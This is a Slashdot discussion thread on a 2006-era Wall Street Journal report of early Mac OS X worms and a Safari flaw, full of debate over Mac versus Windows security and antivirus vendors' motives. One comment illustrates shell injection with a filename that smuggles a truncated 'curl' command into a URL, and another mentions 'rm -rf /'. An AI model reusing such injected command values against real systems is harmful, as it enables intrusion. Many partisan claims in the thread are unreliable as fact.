Slashdot Mirror
Computer 'Worms' Turn on Macs
Carl Bialik from WSJ writes "Macs have been laregly immune to the viruses, worms and malware that have plagued PCs, but the Mac's recent popularity uptick has meant that 'bad guys appear to be casing the joint,' the Wall Street Journal reports. Among the signs: two recently discovered worms and the discovery of a vulnerability in Mac OS X that leaves Safari open to a hack. A Symantec engineer predicts a 'gradual erosion' of the idea that Macs are a safer operating system than Windows. 'Some security experts believe hackers are becoming more interested in writing nasty code for Macs precisely because of reports of its relative immunity to security woes,' the WSJ reports. 'Apple itself has gone out of its way not to promote the Mac's relative safety, lest it tempt hackers to prove the company wrong. Apple declined to discuss the topic of security in depth for this article.'"
A Symantec engineer predicts a 'gradual erosion' of the idea that Macs are a safer operating system than Windows.
Now there's a neutral party with no agenda when it comes to security!
Honestly, the worst Mac malware I've seen so far had a Symantec sticker on the box.
Fleur de Sel
The could report a worm or virus a day for the rest of my LIFE and they'd still have a better security record than Windows.
Macs have been laregly immune to the viruses, worms and malware
Just because no one has exploited a system doesn't mean it doesn't have exploits. I know about a month ago this came up in an article about how OSX/Linux users could face issues because they felt to secure. Hopefully they will be able to cut this off at the quick but don't think that running an "obscure" OS makes you safe. How many Mac users today run anti-virus software?
Dedicated Cthulhu Cultist since 4523 BC.
seriously if you have to manually download the program and enter your admin password, it is not a virus or a worm. I dont know why people keep calling it that. It is a Trojan and those have existed since the first rm -rf / script.
The war with islam is a war on the beast
The war on terror is a war for peace
...but I digress. Regular updates, safe web browsing, and not clicking email links should be the norm anyway regardless of operating system. Of course "safe web browsing" means different things to different people.
A virus is not a worm. If it requires you to execute it or interact with it in any way, it's not a worm.
Repeat after me: This is social engineering.
So the virus turns the computer on, even after they've been shut off? Thats pretty cool.
Every reporter that misclassifies trojans and viruses as worms needs to be beaten over the head with a herring.
Worms are very different than viruses. Don't mix them up! It's not that hard!
An OS's security is directly related to its popularity. The less popular, the more secure and conversely, the more popular, the less secure. Hackers aren't gonna waste time on an unpopular OS. Whens the last time you heard of a security threat for BEOS? It's not because its secure... its because nobody uses it.
http://religiousfreaks.com/Windows has had what, like 200,000 Virus's in the last year? Apple has had two or three theoretical exploits that either require the user to run code by hand or else target services that most mac users don't turn on. Sounds like Apple is doing its job to me. And honestly this idea that as Apple gets more popular there will be more viruses is largely a load of crap. The notoriety of writing the first real virus for OS X would be vastly more than for writing yet another windows virus. The reason why no one writes viruses for Apple is most likely because people like Apple and want them to succeed. I think if people start writing viruses for Apple it will be because Apple gets lazy and stops innovating, or else stops at least trying to fix the bugs in its software. Because right now both the means and the motive or there, but it's just not really happening.
Most of the "worms" I've seen on Mac haven't actually been worms. They come in via safari and are disabled by unchecking a checkbox. It's not like the windows worms where they have a service that nobody uses listening on a port that is able to execute the code. And it doesn't trash the system because you don't have root access on by default.
Anthropic principle: We see the universe the way it is because if it were different we would not be here to see it.
The Independent: Reverend Spooner Arrested in Friar Tuck Incident - ISIHAC, Historical Headlines
If companies like Symantec would stop making those damn viruses the world would be virus free. But then companies like Symantec would not be needed.
And if they can't make any viruses, they start making up shit about that it is not safe for users anyway.
I guess this will test whether Apple's approach to security (i.e., pretty much like Unix's) is better or worse than Microsoft's.
I.e., will these worms affect the whole computer because of a fault in the operating system, or will they affect only a single user on the computer because of a software issue that let the worm in to play in that user's space, or will it affect people only because of user stupidity ('ooh, really, clicking on this will make my pen0r bigger!')?
Note that Microsoft gets critical security issues fairly often with their approach.
The recent Apple issues have been lowest rated security issues.
Certainly I think that not having users run as root by default will help Mac OS X, but that doesn't stop them entering their password when prompted.
You can't secure against user stupidity except by scanning each file that they try to execute for viruses. And that means virus checkers, and the associated slowdowns they bring.
Folks don't need to worry.
Using google images as a definitive source, I tried the following searches
Microsoft worm
and
apple worm
Surprisingly the Microsoft one was filled with warning messages and exclamation marks and maggots.
Meanwhile the apple one was all cutesy and cartoony and fluffy (some of the worms even appear to be wearing turtle necks)
The world will continue to turn.
liqbase
No one ever said Macs were perfect, just that they are better. It's amazing to me how there can be hundreds upon hundreds of fllaws in Windows, but as soon as a token flaw is discovered in the Mac somehow Wlindows users feel vindicated. I suppose it's a matter of emotional self-defense - they don't want to feel bad about buying/using Windows, so the smallest Mac flaw is exaggerated.
A Symantec engineer predicts a 'gradual erosion' of the idea that Macs are a safer operating system than Windows.
Well, yeah... Symantec has kind of a vested interest in gradually eroding that idea, don't they?
Every piece of code is subject to exploits. Show me a program/OS that is 100% infallible and I will show you a liar. I think that the main reason OS/X (and *nix for that matter) was considered to be rock-solid is because very few people were taking shots at it. Now I do realize that *nix-based OSs do plug up the obvious holes that MS left open. But don't assume that just because no one has broken into your house yet that your house is completely secure.
A computer is only as secure as its maintainer. I am running a small network at home that has a mishmash of linux and Windows computers. Now is it right for me to say that my linux computers are more secure just because they are running linux? No, that's stupid. The same thing applies with this story - Macs can be exploited because that is the nature of the business. We usually find the holes because some numbnut exploits it.
Just my $0.02
- Andrew
I meta-moderate because I care.
Simple math based on market share show why malware writers haven't targeted much more than Windows (not that Windows isn't easily compromised). If you write something that has almost no chance or spreading around, or even if it does, won't do much, what's the point?
Now that Macs are getting popular, we'll see more of it... the same goes for Linux. It's simply a matter of time.
Mac's are not "immune" to anything.
They are not "targeted" due to their small market share. They are also not targeted due to the fact that they keep changing OSs, processors and whatnot such that any Mac (OSX PPC, OSX x86, OS9 PPC, OS9 Moto) is a subset of an already small market share.
Windows is a huge bullseye due to is truly massive installed base. Linux will be the next target.
There are like 4 steps to protecting yourself against viruses on Macs:
1) Leave your firewall on as many ports as possible. Only open it on non-major ports when you're actually using them (it's so easy to change if you want to)
2) Block images in email and don't open DLed crap.
3)Don't run as Admin. make a new account, check the admin box, and uncheck yours.
4)If you're super-paranoid, change the privledges to Terminal to take away everyone's access except root.
These steps literally took 3 minutes on Tiger.
I've got your "bird" right here, Symantec.
--- What?
The worms didn't appear to inflict any meaningful harm on Macs -- they required users to go through several steps on their computers before being infected.
Doesn't the fact that they require user intervention to propogate make them not worms but trojan horses? Every OS is vulnerable to those, from Irix to Windows.
...use RAID
He who knows best knows how little he knows. - Thomas Jefferson
Personally, these two "worms" for OS X don't worry me too much. They both seem to require user interaction inorder to infect the system. What will really be of concern is a worm that can spread without the user being involved in any way. Personally, I think that OS X is much less likely to suffer from exploits of this type than Windows.
SIGFAULT
It's never been that (at least for most people). The advantage of Mac OS X is that it is less vulnerable than Windows (making Windows an easier target), and that Apple made decisions in the design process that mean that the typical consequences of a flaw are less severe. In recent years, Microsoft has attempted to harden Windows further and reduce their exposure - in W2K3 Server, for instance, they've done a pretty good job of it.
Even if Apple magically pulls some sort of super OS-jujitsu that reverses their market share and Microsoft's, the basic architecture will stay the same underneath - and that means Apple will have their relative advantages intact for the foreseeable future. Windows is, as its heart, an OS that has traded off many security options for ease of access and ease of programming. Apple had the advantage of seeing what was already happening to Windows when they made their decisions about how OS X would be designed, plus the system it was derived from was pretty robust to begin with.
There will be viruses that attack Mac OS X. Some will do a pretty good job of attacking. I'm kind of surprised it's taken this long to get there. But I'm also not expecting it ever to compare to Windows in that regard.
-- Josh Turiel
"2. Do not eat iPod Shuffle."
Some security experts believe hackers are becoming more interested in writing nasty code for Macs precisely because of reports of its relative immunity to security woes
This is what I've been saying for a while. Really, it's kind of a self-evident thing. Let's face it, the hacker (and/or cracker) mentality is often to do things to see if/because it's possible. It's the entire point. Just like government targets have historically been more tempting because they're supposed to be more secure, the more 'impossible' it is to do something, the higher that temptation. It's about cred and skill and kung fu. And there are people that think that way that have destructive, rather than constructive aims with this. Especially given the attitudes of some Mac users. Finagle knows it ain't all of them, but honestly, there are plenty that even I occasionally wouldn't mind seeing taken down a peg or two.
Everyone (at least anyone who writes code) knows any non-trivial system is going to have bugs, and weaknesses, of some sort. Will there be a pandemic like with Windows boxen? I doubt it, but on the other hand, I also doubt that all Macs have 3 inch hypersteel plating with regenerating plasma shields and a cloaking device. Maybe that's just me, though.
Folks,
The key thing to eyeball here, with all the FUD that has been stirred up, is there are OS vulnerabilities and application vulnerabilities. Much like the annual brew-haha when we comapre Linux versus Windows, you must make a clear differentiation.
Like Linux, I would never count, say an Apache hole against Mac nor Linux, since it's an application that is added after a base install. However, unlike Mac or Linux, Windows flaws are very much a hybrid. Windows really doesn't function much as Windows without IE (try reviewing a browser hijack, and see that the file explorer uses the IE render engine to see that an IE flaw is an OS flaw), and subsequent issues with IE are counted against the OS.
The issues found recently with Bluetooh OBEX and the Safari "open anything" flaw are two examples of differentiators. the OBEX flaw, is yes, a core OS issue, however, it was identified and patched two patches ago (10.4.3), Apple is no longer shipping the OS in that rev anymore. Minus one to OS security for Apple. Hoever, Safari, an application above the core OS, had a "bad settings default" besides the overall flaw in the app. In short, both are avoidable through an alteration in settings or application of an old patch. To be surprised that the Mac is "insecure" by the press FUD is rediculous.
Windows, as I sit on Microsoft briefings to my company each month, have not only application security issues on a predictable and regular basis (slow months in the summer and December are do to staff vacations), but because many of those apps are so tied into the core workings of the Operating System, that each new flaw opens a bigger hole that build upon each other. A standard install of XP out of the box takes 38 patches plus the two required to just upgerade to the latest version of Windows Update. WTF?! And that does even cover the OS settings needed to make it "generaly" safe to put on the Internet.
I feel safe putting ANY Mac, BSD or Linux box on the net for a half hour while I patch, because, in general are most of the distributions have reasonable defaults set, but, as they stay current, it makes it much less appetizing for the latest virus, worm, or hax0r than your default XP install. As it is with big business security, you don't nessesarily have to be the most secure, you just have to be less appetizing than the next guy down the row.
I'm truly sick of the news media (print, on-line, and TV) spreading unknowledgeable FUD to the masses, just because it's "something different" without recognizing why it may be different, let alone the overall truths. Remember kids, duck and cover!
Nothing to see here... move along.
Don't worry they all do
The day that I don't have to enter an admin password to modify a file in one of the root directories is the day that I start worrying about security on my Mac.
-ch
From the linked article:
A worm propagates by itself without user intervention. While at first glance it may seem that means the user doesn't have to run it in the first place, that's a common misconception. What it means is, once the program is active it is then able to spread itself via the network without user intervention. Unlike a virus, once active, merely infects files which then must be transferred to another computer from the original infected computer manually by the user.
The difference in a virus and worm is the method of propagation, not execution.
What do you mean, "very few people were taking shots at it"? The whole premise behind security in an open source system is the concept that A LOT OF PEOPLE take shots at the system.
Unix has been running on servers for years. People have been trying to chip away at the security of these machines for just as long as they have been around. Whole hacking communities were created around attacking the security of these machines. To claim that few people have attempted to usurp the security in unix and linux based machines is preposterous.
------------------
"A computer is only as secure as its maintainer. [...] Now is it right for me to say that my linux computers are more secure just because they are running linux? No, that's stupid."
Forgive me for saying, but the only thing stupid about what you have said is your assumption. You assume that because any program MAY have holes, that every program is EQUALLY open to insecurity.
Computer 'Worms' Turn on Macs
Worst. Switch Ad. Ever.
As MS gives up its last true monopoly! ;)
I mod down so you can mod up. Your welcome.
The reason why no one writes viruses for Apple is most likely because people like Apple and want them to succeed.
Considering that the main incentive for virus writers these days seems to be economic (profitable criminal activity such as spamming, phishing, DDOS blackmail, identity fraud), it seems unlikely to me that these criminals care if Apple succeeds. More likely, the profit motive isn't there, probably a result the combination of greater security on OSX, and smaller installed base.
http://upload.wikimedia.org/wikipedia/en/thumb/4/4 5/Fish_Slapping_Dance.png/180px-Fish_Slapping_Danc e.png
Prof. Farnsworth - "Oh a lesson in not changing history from Mr I'm-My-Own-Grandpa!"
...what turned on Macs as a sexy iPod, just waiting for it's upload.
I guess it's hard to compete with an "agressive worm".
..the definition of FUD?!
Seriously, it seems liek every week that I read a slashdot article which proclaims that the days of the virus-free Mac environment are numbered, and that Mac users will soon be the number 1 target of the malware writers. It seems that if you can use the words "Mac" and "virus" ** in the same article then you're bound to get it posted on some tech news-sh^Hite. Then give it two or three days and virtually the same article will pop-up on the BBC's website with even more inflated dire warnings.
Everyone knows that Macs "could" be susceptible to malware, so why do we keep on hearing the same doom story over-and-over again? Why not wait until there is a real threat?!
Well, we know why don't we?! It's because the anti-virus / anti-spyware vendors aren't getting their fair share of money from Mac users, and so they keep banging on with their FUD!
-----
** or Tojan, malware, spyware, etc...
return 0; }
Typical 'man bites dog' approach. If it is unusual, it is news. Microsoft Windows is a bug ridden unsecure OS, but since everyone (or at least 90% of users) use it it is not news. No one questions why a defective product exists or what it is actually costing in lost productivity. It is normal in most users' worlds, those users who never have experienced anything else.
OS X exploits are news only because they are unusual (though it does serve as an early warning, I sincerely hope Apple is busy auditing their code base). The fact that they are not as severe as Windows exploits, requires more user intervention and are often limited in scope are not discussed or probably understood by most people.
putting the 'B' in LGBTQ+
Now is it right for me to say that my linux computers are more secure just because they are running linux? No, that's stupid.
.NET does solve buffer overruns (unless you make any calls into Win32 or other C code, which Microsoft makes unnecessarily difficult to do correctly), but it pushes threads even harder. Secure software has to be correct, and threaded correct software is an oxymoron. Now you've got race conditions. The only race condition I usually have to worry about in a typical Unix software package is use of tmpnam() (and every time anyone compiles a piece of software, they get warned about it).
It's not that Linux is secure. It's that Windows is *insecure*.
Microsoft had a long period (perhaps over?) where they introduced *horribly* insecure designs -- making decisions that completely ignored security in the name of any shred of functionality that they might gain. (And those designs still affect us today.) Double-click execution of executables in email, using their full-blown web browser to view emails (which escallated any security hole in a web browser into a worm-class bug), default of no Administrator password on NT, default share all drives (but make them "invisible" to other Windows machines), design a windowing API that essentially makes local security on a computer impossible, have a system where each file has many names (which makes it damned difficult to write a secure server), encourage people to use threads (because their OS lacked copy-on-write), omit the ability to create chroot jails from their OS, run all kinds of servers by default (remember Messenger Service and the spam that you *knew* was going to happen?) allowing IP-baed access and then proceed to blame sysadmins for not firewalling Windows boxes because Win machines weren't usable out of box on the Internet, bundle telnet but not ssh, and so forth.
Hmm...other goodies. POSIX places hard bounds on what calls do. Microsoft provides MSDN, which provides some examples and no guarantees. It's a tutorial, not a spec. Writing secure software when you don't have guarantees on *exactly* what a call can do or will do in future revisions of the OS is damned impossible. Because Windows isn't a very usable multi-user machine, software authors essentially ignored local security for years -- most Windows software can be attacked every way to Sunday locally (though I'll grant that this wasn't directly MS's fault). There are local security vulnerabilities in Unix software as well, but people actually *care* about them and fix them if they can find them, and don't just introduce them without a care in the world.
Secure software is correct software, and because Windows tries to guarantee binary compatibility and there is only one Windows, developers don't often look up the spec (when I code serious software under Linux, I have the C99 spec in one window and the POSIX spec in the other). It's just a matter of "well, I've passed in this invalid value and it seems to work, and it'll probably keep going". That drives me nuts. Try saying that on comp.unix.programmer, and you'll discover a higher standard.
And MS is still doing it. Okay,
Now, Microsoft provides lots of security *administration* tools. They provide a sophisticated (I'd even argue overcomplicated -- in the vein of VMS, the problem is not a lack of controls, but in users not understanding the system fully) ACL system. The rules for what exactly happens with permissions when copying files around are bonkers. Sure, most users don't care, but if you're trying to write a system that doesn't have security holes, it's a royal pain in the ass. If it takes a ton of work to figure out and write something properly, developers will just stuff a maximally-permissive ACL on something -- under Unix, you have exactly 12 bits and an owner and group to worry about, and there's the extent of your permission system.
But the problem isn't a lack of frontends and tools. It's the coding and design practices, and that's just ha
Any program relying on (nontrivial) preemptive multithreading will be buggy.
The thing the Mac does that really should be automatic in Windows, and should be in Vista, is that it doesn't give its users full rights. Each time you do an install it requires your password, otherwise you have standard user rights, which prevent a lot of programs auto-installing. I have been using non-mac pc's for a long, long time and finally bought my first mac this month, so I am looking at everything through a Windows lens. I think the security settings make more sense on the Mac, as does the closed nature of the operating system. It leaves fewer opportunities for the end user to do something stupid, or more likely, prevents them opening up security holes by not doing something. This is probably all my fault for buying a Mac. Be warned, I just installed Linux for the first time, as well, so there is no doubt trouble on that horizon, too.
These are the same 'security experts' that were upto recently predicting that no one was writing malware for the Mac precisly bqcause of its low userbase.
This would also be news to the Apple developers. Does this 'security experts' have any citations for this statement. Also OS X is based on bsdUnix which by default works on the least privilege model they are currently innovating into Vista.
davecb5620@gmail.com
As long as you don't go to dodgy sites you'll be fine. I was kind of shocked the other day when I looked at a Windows computer that had everything, virus protection, spyware protection, and there was a mywebsearch bar installed on _firefox_. No one knew how it got there.
In my opinion, it's stuff like this that make Windows such a hassle: not Viruses/Worms, but Spyware/Malware which target the Windows platform.
Well, until just a few weeks ago, there was nothing to scan for, except Windows virusses! So what would the point have been?
The major vendors have engines ready to scan, but things will have to get a whole lot worse and more regular before I will pay up and slow down my system with one of those bastards....
According to the Reg the OS X security exploits are largely academic and not serious threats.
For the foreseable future Microsoft Windows will remain a huge security risk.
Developers: We can use your help.
Considering that the main incentive for virus writers these days seems to be economic (profitable criminal activity such as spamming, phishing, DDOS blackmail, identity fraud), it seems unlikely to me that these criminals care if Apple succeeds.
All of those require infection of a system, which requires the virus/Trojan/worm to copy itself from one system to another. The increasing number of Macs creates more dead-ends for a proliferating virus.
Imagine two situations. In the first, everyone is using a Windows machine. In the second, half are using Macs and half are using Windows. Everyone has 5 random other machines in its address book (e-mail addresses of the primary user). In the case of a zero-day exploit for Windows, how quickly will the all-Windows cluster become infected?
In the case of the Mac/Windows hybrid cluster, though, the speed significantly decreases and it becomes possible that some machines will never be infected. Why? Each machine sends out 5 e-mails; those that go to Macs will not be exploited. That means, on average, each machine can only infect 2.5 others (rather than 5) and the path to any Windows machine must not intersect only Macs.
In a real world situation, the lack of intersection is the smaller problem (since most people have everyone's e-mail in their address book), but if you're wasting resources sending out suspicious e-mails to Macs, you're mitigating the advantage of the zero-day exploit.
Besides what Hollywood tells you in a fine movie full of suspense, real burglars break in using the easiest entrance first. That is why "Apple gets more popular => there will be more viruses" is a cheap and wrong statement.
Or for that matter, "Windows gets all the viruses because of it's market dominance", sounds really funny to me.
Follow the path of the least resistance.
Even if I start a regular program on my Mac for the first time, it asks me if, since it is the first time I run it, if I really want to do that... Social Engineering on both sides of the fences!
No system is 100% safe. But some are a lot safer than others.
--------
* Sigh *
Agreed: If you want Mac malware, you have to go to a store and buy it.
It's completely unacceptable that Slashdot editors would post this garbage. From the referenced article:
"In the past two weeks, information-security companies like Symantec Inc., Sophos PLC and McAfee Inc. have identified several security issues related to the latest version of Apple's Mac operating system, called OS X. Among the concerns: two "worms," programs written by unknown hackers that were designed to spread themselves to other Macs through Apple's iChat instant-messaging software and Bluetooth wireless-communications capability."
Translation: Some public relations drone, with no technical knowledge, paid the Wall Street Journal to post the article. The Wall Street Journal is a "What the rich want you to think" publication, and, in my experience, usually unreliable for anything useful. Note that the article jumps from subject to subject rapidly, apparently to hide the fact that there are no actual incidents of Mac infections to report.
Another translation: Symantec, a maker of very buggy security software of poor design, and other "security" companies want Mac users to buy their products.
Some people, in my opinion, spend their entire working lives being dishonest, trying to trick other people. In my experience some of them work for WSJ.
-
Cheney's company is rapidly building prisons for the U.S. government.
I wonder if/when the new intel-macs will have dual-booting abilities and you are able to install Vista, or worse XP, on them, could this make the Apple-OS more vulnerable? I'm thinking rootkit-like virusses and assuming that Vista-security could be lacking.
As a Mac user I have never had to run virus scanning software and I've never had a virus!
I also have never been to the dentist and never had a cavity but thats a different issue.
As most malware attacks are for profit these days, the Windows environment, with its huge level of insecurity provides a bigger payback for the investment of time and effort involved.
If Apple and Linux boxes were more popular - or become more popular - for desktop application systems which are connected to the Internet, they would get targeted more. But, there is a saving point here. If these systems can be properly configured and locked down so malware can't get started they will remain relatively immune. Once it gets around that Apple or Linux systems have good "as installed" security against malware, its authors will look elsewhere as criminals are just as lazy - if not more so - as everyone else, and are not going to work hard for small returns. Problem is, the settings for this will have to be done by the release maintainers as most people will probably use them 'out of the box' in whatever way the system is set up to be configured. If the Linux and Apple OS release maintainers do not design their systems to install in a secure method in the first place, (Linspire being the prime example, having the user default to root), these systems can and will become just as buggy and virus-ridden as Windows boxen have become.
Paul Robinson
paul@paul-robinson.org / paul@paulrobinson.org
The lessons of history teach us - if they teach us anything - that nobody learns the lessons that history teaches us.
Most *nix systems (including GNU/Linux, the BSDs, Mac OS X (Darwin), and Solaris (Open Solaris) are OPEN SOURCE.
While this does nothing to guarantee immunity, it does mean that the cards are on the table, and face up. Anyone who wants to browse the source is free to do so, which often means vulnerabilities are found, and many times patched long before an exploit exists in the wild.
Contrast this with the "Microsoft" way:
No really, it's secure this time. No we fixed that! Trust us. We're focused on security. What do you mean you'd like to audit the source code? Are you in the European Union? You understand we are going to have to charge you for a peek.
Personally, I prefer the former to the latter.
While there is certainly great potential for abuse, I still believe Macs come more secure "Out of the box."
On a Mac - All the communication ports are closed and all native services -- personal file sharing, Windows file sharing, personal web sharing, remote login, FTP access, remote Apple events and printer sharing -- are turned off by default.
On XP Service Pack 2 - The Windows Firewall is enabled by default (Great!) But file and printer sharing default to on and you still have full admin on the machine by default.
In the end, Windows and "Unix flavored" OSes can both be hardened considerably by someone with the knowledge and tools to do so, but for me it always comes down to having a secure and transparent foundation and that means open source.
Full Disclosure - I admin both types of platforms in a variety of flavors but I prefer Unix to Windows so factor in my bias into the above.
HA-HA! :)
At least most reports have stopped claiming there was a virus! Here is a better URL since Commander Taco (or someone else) is about to have their WSJ account suspended. Why do these news companies try to force people to provide a password? I hate that, putting up with advertising is annoying enough. http://online.wsj.com/public/article/SB11409996477 6283796.html
I paid the going retail price for a Windows screen reader and got a free Unix computer!
"Apple itself has gone out of its way not to promote the Mac's relative safety, lest it tempt hackers to prove the company wrong. Apple declined to discuss the topic of security in depth for this article.'
Not to long ago; wasn't there a challenge about writing viruses for the MAC; while jobs put up a bounty. Later they retracted the bounty and offer.
In a stunning change of tactics, Slashdot today began running MS FUD stories as 'real news.'
A nation mourns. (but not much)
FU Big Billy.
Can we stop using the term "PC" like that already? PC isn't a model name or an operating system; it's a form factor. PCs are smaller than servers, less powerful than workstations, and might include laptops but probably not handhelds. Most of Apple's offerings are personal computers. My computer is a "PC" in that it uses an x86 processor and shipped with Windows, but I run linux so I'm also immune to all that stuff that should be "plaguing" it. Viruses and malware are a problem on Windows (only because it's the most popular; they will target any OS that gains enough market share), not some broad hardware platform that even Apple is adopting now.
Everyone is born right-handed; only the greatest overcome it
Summary says, "two recently discovered worms and the discovery of a vulnerability in OS X that leaves Safari open to a hack."
This is not true. These things were not recently discovered, they are years old, and they are not a vulnerability, but rather a stupid choice in implementation by Apple, by "Opening "Safe" files after downloading". There are no "Safe" files until a user determines they are safe, and even then, many users are not that good at determining safe and nonsafe. But they are much, much better than computers at figuring out this stuff out a priori. Computers (after being told what to do) are better at post mortem stuff (anti-virus, spyware and adware removal, etc).
Oh, and Symantec of all people are reporting this?
From what I know, they are a terrible software company that make buggy "security" software whose business model is going to be taken away when Microsoft starts selling security as a service for their buggy software just like Norton utilities went away when MS started providing more robust filesystems and bundling (rebranding) some of Norton's stuff.
The guy who wrote this article doesn't know what he's talking about. "Worms" spread without any user interaction -- they can infect millions of machines on the internet in hours. Those are the kind of vulnerabilities that got Microsoft in trouble in 2003. Viruses require user interaction to work. All the "vulnerabilities" described in the article require the user to install a program and it's trivially easy to be destructive once you have the user's trust.
In addition, virtually all the vulnerabilities described by the article are local ones -- meaning a malicious person needs access to the machine. Truly dangerous vulnerabilities offer remote access, which means any random hacker on the Internet can control the machine from afar. AFAIK, none have been discovered in most Linux distributions or OS X. If OS X did ship with remote vulnerabilities, THAT would be huge news.
The only relevant part of the article comes at the very end:
Many viruses and worms, for instance, don't exploit security holes in operating systems. Instead, they use what are called "social engineering" techniques to trick users into doing things that they shouldn't do, like unwittingly installing programs. The Anna Kournikova worm from 2001, for example, infamously tricked Windows users into installing it by masquerading as photos of the leggy Russian tennis star attached to e-mails.
Rather than weaknesses in operating systems, such approaches exploit "a bug in peoples' brains, which is much harder to patch," Mr. Cluley says.
That should have been the lead. The rest of the article is idiotic.
Expect more "OS X is not secure and eats babies" so just in time for Vista's launch when everybody's mulling over buying a new computer, suddenly OS X looks really insecure and spangly Vista is shilled and astroturfed to be the most secure operating system on the planet to do your online banking with.
I've said it before, I'll say it again. Mac OS X has no vectors for attack except social engineering. You will not see things like Slammer or Blaster on the Mac, as there are no ports open on a default install. None. How are you going to get in the box now, other than stupid users (which there is little you can do about)?
Mac OS X - thanks to fewer services running, no network ports open, no root user, and strong use of system permissions - presents a much smaller surface area to attack than Windows. While market share magnifies this effect for those who are writing viruses for economic gain, if the two were equally matched in terms of share, Mac OS X would still be more secure.
Next.
I don't know what kind of crack I was on, but I suspect it was decaf.
Be careful, you might disrupt the reality distortion field Apple fanboys have so diligently constructed. When a worm or virus infects Apple computers the definitions of worms and viruses must require revision.
while i was reading this newsbit, as i read past "Apple itself", in my head i actually pronouned it "Apple iTself" (with a long i). yay marketing!!
If cell phones have already 240 virus it's considered insignificant, if the Mac gets two half-ass worm that did absolutely no damage and have to be specificaly authorized by the user to trigger themselves the Mac security myth is eroded...
go figure
Nelson Munce: Haa Haa!
Posting that will get you banned on at least one Mac forum since the majority of Mac users don't have a clue as to what that does.
The only worms I've seen announced for OS X so far have depended on social engineering attacks. Social engineering attacks are possible on any OS, because they work by convincing a user to do something. They're basically the same kind of "security hole" as the one the folks claiming to be an exiled dictator with a bundle of cash...
The central security hole* found is one that was discovered almost two years ago, and Apple has refused to fix. That security hole is the use of the desktop shell interface to run programs to display untrusted content. As I wrote at the time this is fundamentally insecure, and yet the native browsers and third party ones still do it.
This is the same kind of error as having a browser on UNIX run an external viewer for a link with code like this:That would be a security hole you could drive a truck through, because you don't know what the shell is really going to do with whatever the URL contained. Maybe it looks like benign.pdf?";curl http :
Well, Safari doesn't really know what the shell (LaunchServices) or the app it calls is going to do, either. It's not quite as obviously bad as the above code, but it's subject to the same kinds of attacks. As has been shown multiple times already on both OS X and Windows.
What's safe?
Well, there's two options.
1. Safari can maintain its own database of safe applications to pass unsafe files to, and call them directly rather than through LaunchServices.
2. Apple can provide an alternate LaunchServices for unsafe content that ONLY contains applications that are explicitly designed for handling unsafe content, or alternatively add an option to LaunchServices saying that the content is unsafe so it can use an alternate database.
Here's some options that have been tried and don't work:
1. Maintain a list of file types and suffixes that you consider "safe", and only use LaunchServices to open these files (Safari and Firefox and IE do this).
2. Modify LaunchServices to try and figure out when an application is being launched on an "unsafe" document, and ask the user if they really want to do this (Apple's 'fix' for the original hole, which has already failed twice).
3. Maintain a list of locations that are "safe" and "unsafe", and only allow dangerous actions based on the location (Microsoft's Security Zones).
So far Apple's tried two of these, let's hope they don't try the third.
* Exacerbated by two other holes: making "Open Safe Files" the default, and considering archives to be "safe" files.
What they don't know is that the mafia run Macs with OSX ;) Obviously, there are standing orders not to allow viruses for said systems, so as to not inconvenience the bosses.
Last time I checked setting up startup item required admin password.
Correct Link.
There are a few, but these two in particular are very bad:
"Newer machines can only execute new code from emulation called Rosetta" = "Newer machines can only execute new code or old code through an emulation engine called Rosetta"
"or use techniques to lure the user to do that, and as long as it does not try to access a virus." = "or use techniques to lure the user to do that, and as long as it does not try to access low level features a virus would need."
Now that Apple is using Intel processors, does it improve the cost/benefit ratio for criminals? The argument for Apple has been not that they are better built (they may be - not trolling), but that there are fewer of them, therefore not worth the effort of writing a seperate worm/virus for. Now that they use the same hardware as the more popular Windows boxes, there may be reuse of common payloads. The point of entry may still be different (different weaknesses to exploit).
I'm in my right mind and I have the answer to everything!
Don't forget that the WSJ is the home of Walter Mossberg... the ultimate (corporate) Mac fanboy. I don't think that the WSJ has every published anything even remotely negative of the Mac in Walter's columns. Here is a case of a journalist trading access to the hottest products and inside interviews in exchange for only publishing positive reviews. Real reviewers that occasionally write bad things (tm) about Apple are banished from the A list of reporters invited. If you really write bad things (tm) about Apple your company can be banished and all of your firm's publications removed from Apple stores.
Windows is so far ahead in the malware world, there is no way that any other system will ever catch up to the hundreds of thousands of viruses, worms and trojans that is essential to the full Windows experience.
Oh well, what the hell...
Wake me up when we reach the "minor outbreak" stage.
And I still remember the good old days with Scores and CDEF and nVir.
#naabhaprzrag, #sverubfr-000, #agi-fcbafberq, negvpyr[pynff*=' negvpyr-ary-'] { qvfcynl: abar !vzcbegnag; }
I mean, the story posting? Is it a cron job?
Like, every two weeks we see, "$ASSHAT_ANTI_VIRUS_COMPANY sez there is something not entirely unlike an OSX worm in the wild, and uh, Mac users have been lulled into a false sense of security, and uh no Mac user has ever actually seen a real virus in the wild because they're not all that popular, and um, like, we should all go buy us some Anti-Virus software."
Stop posting PR crap, please. Don't be a PR tool.
A Symantec engineer predicts a 'gradual erosion' of the idea that Macs are a safer operating system than Windows.
this logic simply is not valid. it omits inherent differences in security between unix variants and windows.
IF unix was only as inherently secure as windows, THEN it would have long since been thoroughly exploited BECAUSE unix has long housed some of the most mission-critical and profitable data out there (and therefore some of the most profitable data to be gained by exploiting said systems)
A year spent in artificial intelligence is enough to make one believe in God.
You guys must be kidding right?
I have seen worms in apples, but Trojan horses??? Naaaa..... That's just belloni!
If it was even primarily market share the number of worms, viruses, and other malware for Windows should have been higher through the '90s, and followed a continual upward curve against a matching downward curve for Macs. but that didn't happen... instead, after 1997 there was a sudden massive surge in Windows worms and other exploits. This surge is correlated with and caused by the introduction of what was then called "Active Desktop".
Buffer overflows and the occasional string injection, these can be found on any browser and any OS, and can be quickly fixed without breaking working code. Social engineering attacks, these used to be the majority of worms... before Active Desktop if you were savvy to them keeping your eyes open was pretty much enough. Trojan horses, viruses hiding in innocent downloads, they became increasingly rare as the Web meant that people weren't passing shareware around on BBSes and maintaining "upload quotas" to keep their downloads working. Peer-to-peer brings that kind of thing back, but it's no longer the main distribution mechanism for shareware.
So, really, we should have relatively fewer virus problems now. People are getting more familiar with computers, and few people are caught out more than once by a worm hiding in an email message if they have a chance to think about the attachment, if they download it and then open it in their own time.
But something happened.
Back in the early '90s there was this joke going around the net about a virus that was so clever it would run if you just READ an email message! Everyone knew it was a joke, because NOBODY would be so stupid as to write an email program that let you do that, or if they did they'd back out of that as quick as the "WIZARD" hole was backed out of sendmail.
